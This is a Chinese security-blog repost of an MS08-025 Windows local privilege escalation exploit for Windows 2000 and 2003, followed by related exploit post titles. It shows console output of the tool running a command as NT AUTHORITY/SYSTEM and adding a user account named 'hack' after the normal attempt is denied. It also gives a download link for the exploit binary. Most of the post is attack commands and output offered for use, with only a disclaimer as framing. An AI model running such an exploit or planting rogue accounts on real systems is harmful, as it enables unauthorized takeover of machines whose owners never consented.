MS08-025 for win2k & win2k3 's

2017年5月4日02:04:41评论423 views字数 1176阅读3分55秒阅读模式

摘要

来源：酒水不犯茶水Win2k CN SP2 ，Win2k3 CN SP1下测试通过，其它未测试(不装XP那种垃圾)
D:/>whoami
BAICKER-VMWARE/009
D:/>net user hack /add
系统发生 5 错误。
拒绝访问。

来源：酒水不犯茶水

Win2k CN SP2 ，Win2k3 CN SP1下测试通过，其它未测试(不装XP那种垃圾)
D:/>whoami
BAICKER-VMWARE/009
D:/>net user hack /add
系统发生 5 错误。
拒绝访问。

D:/>ms08025 whoami
MS08-025 Windows Local Privilege Escalation Vulnerability Exploit
By 009, [email protected]
TEST OS: WINDOWS 2k SP2 & WINDOWS 2k3 CN SP1
Kernel is /WINNT/System32/ntoskrnl.exe
Get KernelBase Success, ntoskrnl.exe base = 80400000
Mapping ntoskrnl.exe … ok
KeServiceDescriptorTable = 008ED280
Find KiServiceTable … Get ZwVdmControl Number … ok!
ZwVdmControl Call Number: 000000E8
HookAddress: 80473CB8
[+] Executing Shellcode…
NT AUTHORITY/SYSTEM
D:/>ms08025 “net user hack /add”
MS08-025 Windows Local Privilege Escalation Vulnerability Exploit
By 009, [email protected]
TEST OS: WINDOWS 2k3 CN SP1
Kernel is /WINNT/System32/ntoskrnl.exe
Get KernelBase Success, ntoskrnl.exe base = 80400000
Mapping ntoskrnl.exe … ok
KeServiceDescriptorTable = 008ED280
Find KiServiceTable … Get ZwVdmControl Number … ok!
ZwVdmControl Call Number: 000000E8
HookAddress: 80473CB8
[+] Executing Shellcode…
D:/>命令成功完成。
D:/>net user
//BAICKER-VMWARE 的用户帐户
——————————————————————————-
009 Administrator Guest
hack IUSR_BAICKER-VMWARE IWAM_BAICKER-VMWARE
TsInternetUser
命令成功完成。
D:/>

http://www.blogjava.net/Files/baicker/ms08025.rar

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

MS08-025 for win2k & win2k3 's

Discuz! 5.0.0 GBK SQL injection / admin credentials disclosure exploit

LBS 2.0.313 重要安全更新 [2007-07-03] 's

LBS blog又一注射漏洞含漏洞解析和exp 's

Penetration Testing 渗透测试 (11%) 's

bbsxp 2007[以前版本不知道]一个有意思的漏洞 's

bbsxp 2007斑竹权限注射 's

bbsxp 2007 注射漏洞 's

BBSXP7 mssql版，从注入到拿WEBSHELL 's

LBS 2.0.312 重要安全更新 [2007-06-29] 's

LBS blog sql注射漏洞[All version] 's

发表评论

在线咨询

微信